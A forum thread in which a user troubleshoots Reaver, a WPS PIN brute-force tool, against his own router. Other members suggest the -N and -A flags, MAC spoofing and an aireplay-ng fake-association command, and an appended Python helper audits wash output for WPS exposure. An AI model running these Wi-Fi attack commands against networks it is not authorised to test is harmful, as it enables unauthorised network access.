
Thread: Help with Reaver

  1. #1
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Help with Reaver

    Hi

    I'm trying to crack my WPS on my Draytek V2110n. I run BT5R2 on my laptop.

    When I run Reaver it fails to associate:

    Code:
    root@bt:~# reaver -i mon0 -b 00:50:7F:AD:28:XX -c 1 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from 00:50:7F:AD:28:XX
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    ^C
    [+] Nothing done, nothing to save.

    I tried pressing the WPS button on my router but it didn't make any difference.

    I tried a friend's AP briefly, and it started to work, then started failing - possibly a failsafe/WPS hack protection?

    Code:
    root@bt:~# reaver -i mon0 -b C4:3D:C7:43:74:XX -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [?] Restore previous session for C4:3D:C7:43:74:XX? [n/Y] Y     
    [+] Restored previous session
    [+] Waiting for beacon from C4:3D:C7:43:74:XX
    [+] Associated with C4:3D:C7:43:74:XX (ESSID: Shabba)
    [+] Trying pin 11115670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response                                                           
    [+] Received identity request                                                           
    [+] Sending identity response                                                           
    [+] Received M1 message                                                                 
    [+] Sending M2 message                                                                  
    [+] Received M1 message                                                                 
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin

    Any tips?

    EDIT:

    Bit more info.

    Repeated attempts show that sometimes it does associate, but it immediately disassociates again.

    Also:

    Code:
    root@bt:~# wash -i mon0
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    ---------------------------------------------------------------------------------------------------------------
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...

    Unless I do -C:

    Code:
    root@bt:~# wash -i mon0 -C
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    ---------------------------------------------------------------------------------------------------------------
    00:50:7F:AD:28:XX       1            -38        1.0               No                HairyThePig

    Still stumped!
    Last edited by hongman; 04-20-2012 at 04:25 PM.

  2. #2
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Help with Reaver

    I remember reading somewhere that someone couldn't associate unless he used the -N flag. Maybe you're having the same problem.

  3. #3
    Member shadowzero's Avatar
    Join Date
    Jun 2011
    Location
    ${HOME}
    Posts
    94

    Default Re: Help with Reaver

    Others have found that it's easier if you associate with aireplay-ng first, and then run reaver with -A.

  4. #4
    Member melissabubble's Avatar
    Join Date
    Aug 2011
    Location
    c:\
    Posts
    85

    Default Re: Help with Reaver

    Try entering your MAC address with the mac= option. It always works for me because I spoof my MAC. Hope that helps!

  5. #5
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Re: Help with Reaver

    Thanks guys I will give those a go.

    How do I associate with aireplay-ng?

    I did think of spoofing my MAC - but I thought if I spoofed the MAC of a valid client, the AP wouldn't respond to WPS requests as the client is already connected?

  6. #6
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: Help with Reaver

    Associate with aireplay-ng:

    Code:
    aireplay-ng -1 0 -a [mac ap] -h [your mac] [interface]

  7. #7
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Re: Help with Reaver

    I tried -A and -N but all I get is timeouts.

    Going to have a play, any other suggestions appreciated!

  8. #8
    Member
    Join Date
    Dec 2011
    Posts
    86

    Default Re: Help with Reaver

    Try running Wireshark and see if your router is ever communicating back. Also, have you tried to associate using another application before you used -N or -A?

  9. #9
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Re: Help with Reaver

    I used aireplay to associate before using -A.

    Been doing some looking around and a few people have mentioned Drayteks are immune to WPS attacks, so maybe I'm just trying against a device that can never be exploited this way.

    I think I have some spare Netgear/D-Link APs in the office, going to have a go with those on Monday!

  10. #10
    Just burned his ISO
    Join Date
    May 2010
    Posts
    10

    Default Re: Help with Reaver

    Did you run "wash" on your router? I don't know about Drayteks, but if it doesn't show up in wash it won't be cracked with reaver. The Actiontecs Verizon is using now, for example, can't be cracked with reaver and don't show up in wash. Point being, if wash doesn't detect it, reaver won't work on it.
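
Added example, not part of the thread or of the Reaver project: a small audit helper that parses a saved wash table in the column layout shown in post #1 and reports, for access points you own, whether WPS is being advertised and whether it is locked. The function names, the constructed sample BSSIDs and the owned-BSSID list are assumptions for illustration.

```python
import re

# Constructed sample in the column layout wash v1.4 prints (BSSIDs are made up).
SAMPLE_WASH_OUTPUT = """\
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------
02:00:00:AA:BB:01       1            -38        1.0               No                OfficeAP
02:00:00:AA:BB:02       6            -61        1.0               Yes               Guest Net
[!] Found packet with bad FCS, skipping...
02:00:00:CC:DD:03      11            -70        1.0               No                Neighbour
"""

# One table row: BSSID, channel, RSSI, WPS version, lock state, ESSID (may contain spaces).
ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<channel>\d+)\s+(?P<rssi>-?\d+)\s+(?P<version>\d+\.\d+)\s+"
    r"(?P<locked>Yes|No)\s+(?P<essid>.*)$"
)

def parse_wash(text):
    """Return one dict per table row; banner, header and '[!]' lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["bssid"] = row["bssid"].upper()
        row["channel"] = int(row["channel"])
        row["rssi"] = int(row["rssi"])
        row["locked"] = row["locked"] == "Yes"
        row["essid"] = row["essid"].strip()
        rows.append(row)
    return rows

def audit(text, owned_bssids):
    """Map each owned BSSID to a finding; other networks in range are ignored."""
    seen = {r["bssid"]: r for r in parse_wash(text)}
    report = {}
    for bssid in sorted(b.upper() for b in owned_bssids):
        row = seen.get(bssid)
        if row is None:
            # Not proof WPS is off: post #1 only got a row after adding -C.
            report[bssid] = "no WPS advertised in this capture"
        elif row["locked"]:
            report[bssid] = "WPS enabled, currently locked: disable WPS"
        else:
            report[bssid] = "WPS enabled and unlocked: disable WPS"
    return report

if __name__ == "__main__":
    for ap, finding in audit(SAMPLE_WASH_OUTPUT, ["02:00:00:aa:bb:01", "02:00:00:AA:BB:02"]).items():
        print(ap, "->", finding)
```

A locked state is still reported as a finding because, going by the behaviour described in post #1, a lock reacts to failed attempts rather than removing the WPS registrar from the AP.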
